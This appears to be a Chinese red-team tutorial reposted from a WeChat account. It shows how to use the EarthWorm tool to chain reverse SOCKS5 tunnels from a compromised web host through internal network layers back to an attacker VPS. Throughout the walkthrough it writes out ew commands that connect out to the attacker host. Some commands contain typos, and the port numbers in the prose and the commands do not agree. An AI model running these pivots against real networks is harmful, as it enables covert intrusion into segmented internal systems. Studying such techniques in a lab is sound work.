EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。对于红队的朋友们来说也算是老朋友了。当我们在进行内网多层网段渗透时,经常会遇到各种代理隧道问题,如果仅使用端口转发是无法完成的,因此就需要利用Socks协议建立隧道,对内网进行渗透。此时的Socks就充当了中间人的角色,分别与双方(B/S)进行通信,就可以通过Socks客户端连接Socks服务,从而进而实现跳板攻击。那么接下来我们就使用EW代理工具,搭建多层Socks隧道。
网络拓扑图如下,模拟内网多层网段,实现EW多层反向代理穿透。
([-选项] [值])*:-s ssocksd -h状态设置功能。您可以从以下选项:ssocksd 、 rcsocks 、 rssocks 、lcx_listen 、 lcx_tran 、 lcx_slaveListenport 打开服务启动的端口。refhost 设置反射主机地址。refport 设置反射端口。connhost 设置连接主机地址。connport 设置连接端口。help 显示帮助文本,通过添加-s参数,您还可以查看更详细的帮助。about 显示关于页面version 显示版本。usectime 设置超时的毫秒数。 默认值为 1000
一层反向连接
我们通过漏洞获取边界主机centos7的webshell,发现该主机可以出网,第二层网络不出网,现在我们通过使用ew 工具搭建socks5反向代理,对第二层网络进行渗透。
1、攻击机(也可以是攻击者的vps)
攻击机上使用EW工具开启服务端监听,执行./ew_for_linux64 -s rcsocks -e 7777 -d 8888命令,监听本地7777端口,同时7777端口流量映射到8888端口。其中-s参数指定使用rcsocks反向代理的方式,-e参数在这里是指攻击机服务端开启监听端口,-d参数是将要映射的端口
./ew_for_linux64 -s rsscocks -e 7777 -d 8888
2、web边界主机
./ew_for_linux64 -s rsscocks -d 172.23.119.142 -e 7777连接攻击机服务端监听的10000端口,-rssocks参数指连接反向代理服务端,-d参数指向攻击机的IP(也就是我们的攻击机或者vps),-e参数指向攻击机开启监听的端口。
3、访问测试
客户端配置socks5 代理,成功访问到第二层网络服务器
通过流量我们也可以看到访问流量通过7777端口转发出去,转发进来
二层反向连接
通过第一层socks5代理我们获取第二层网络主机Ubuntu的权限,接下来需要搭建第二层socks5反向代理,对第三层网络进行渗透。
1、Ubuntu 执行如下命令,开启socks5
2、攻击机器(或者VPS)开启本地监听,将稍后用于连接kali攻击机的7777端口转发到它的8888端口上。
3、这里web边界做为中间节点转发流量,需要把攻击机器和第二层socks5机器连接起来。一端连接攻击机器的7777端口,一段连接ubuntu的8888端口。
4、最后,我们在攻击机器配置代理。访问成功。
三层反向连接
1、攻击机器(或者VPS),将2080端口收到代理请求转发给888端口:
./ew_for_linux64 -s lcx_listen -l 2080 -e 888
2、在第一层主机centos7上,连接攻击机器(或者VPS)的888端口,另一端连接第二层网络主机ubuntu的999端口
./ew -s lcx_slave -d 172.23.119.142 -e 888 -f 192.168.22.129 -g 999
3、在第二层主机ubuntu上监听999和777端口,将999端口代理请求转发给777端口
./ew -s lcx_listen -l 999 -e 777
4、在第三层主机上启动socks5 代理服务,并连接第二层主机ubuntu,将流量转发给他监听的999端口
ew.exe -s rssocks -d 192.168.33.132 -e 777
5、成功访问到第四层网络
整个数据流向是:SOCKS V5 → 2080 → 888 →999 →777 → rssocks
原文始发于微信公众号(贝雷帽SEC):【Tips+1】EarthWorm穿透多层网络
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论